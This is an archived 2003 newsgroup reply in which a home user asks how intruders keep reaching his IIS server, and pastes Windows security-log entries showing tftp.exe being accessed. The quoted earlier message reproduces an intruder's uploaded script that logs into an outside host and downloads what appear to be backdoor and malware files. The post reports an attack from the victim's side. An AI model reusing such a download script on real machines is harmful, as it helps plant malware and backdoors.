Re: Why does this keep happening...
From: Greg (greg_68@hotmail.com)
Date: 02/08/03
- Next message: chot@home.se: "IIS 5 should demand a "special" certificate from internet explorer."
- Previous message: Greg: "Why does this keep happening..."
- In reply to: Greg: "Why does this keep happening..."
- Next in thread: Tim Greene: "Re: Why does this keep happening..."
- Reply: Tim Greene: "Re: Why does this keep happening..."
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "Greg" <greg_68@hotmail.com> Date: Sat, 8 Feb 2003 11:53:42 -0700
In addition, here's what's showing up in my security log in the event
viewer:
Object Open:
Object Server: Security
Object Type: File
Object Name: C:\WINDOWS\system32\tftp.exe
Handle ID: -
Operation ID: {0,17467710}
Process ID: 184
Image File Name: C:\WINDOWS\explorer.exe
Primary User Name: Greg
Primary Domain: DESKTOP
Primary Logon ID: (0x0,0x10309)
Client User Name: -
Client Domain: -
Client Logon ID: -
Accesses: READ_CONTROL
SYNCHRONIZE
ReadData (or ListDirectory)
ReadEA
ReadAttributes
Privileges: -
Restricted Sid Count: 0
Object Open:
Object Server: Security
Object Type: File
Object Name: C:\WINDOWS\system32\tftp.exe
Handle ID: -
Operation ID: {0,17467705}
Process ID: 184
Image File Name: C:\WINDOWS\explorer.exe
Primary User Name: Greg
Primary Domain: DESKTOP
Primary Logon ID: (0x0,0x10309)
Client User Name: -
Client Domain: -
Client Logon ID: -
Accesses: SYNCHRONIZE
Execute/Traverse
Privileges: -
Restricted Sid Count: 0
I have 36 of them in there right now from the last 20 minutes. The user
name 'Greg' is myself. Is there anything usefull in that?
"Greg" <greg_68@hotmail.com> wrote in message
news:eyD7b$5zCHA.1628@TK2MSFTNGP10...
> I use IIS under Windows XP Professional for the Web server (development of
> web sites) on port 90 (my ISP blocks port 80 and people I know need to
> access the web server every now and then to see my work) and what's
> happening is somehow someone is trying to hack in. I have ALL of the
> Windows patches and there is no record of the hack in the web server logs.
> SMTP and FTP are disabled (I checked their log dirs too, just in case).
> This is happening at least a couple times each month from different people
> (different IP in the file they somehow upload and different things they
want
> to upload). Here's the one I received today:
>
> open 68.104.136.245 1415
> user pierre sysop
> get servudaemon.ini
> get winlogon32.exe
> get TzoLibr.dll
> quit
>
> I removed all permissions for TFTP.EXE and FTP.EXE and set them both to
> audit success and failures, but it was blocked by my firewall anyway.
>
> What I want to know is, how exactly is this happening? I read that it's a
> security problem in IIS, which is why I'm posting this here, but I really
> don't understand how this is happening.
>
> I have both Norton AntiVirus (bought it last August) and the latest Norton
> Personal Firewall installed. Both automatically check and install updates
> several times a day so I believe them to be up-to-date.
>
> Can someone shed some light on this?
>
>
- Next message: chot@home.se: "IIS 5 should demand a "special" certificate from internet explorer."
- Previous message: Greg: "Why does this keep happening..."
- In reply to: Greg: "Why does this keep happening..."
- Next in thread: Tim Greene: "Re: Why does this keep happening..."
- Reply: Tim Greene: "Re: Why does this keep happening..."
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
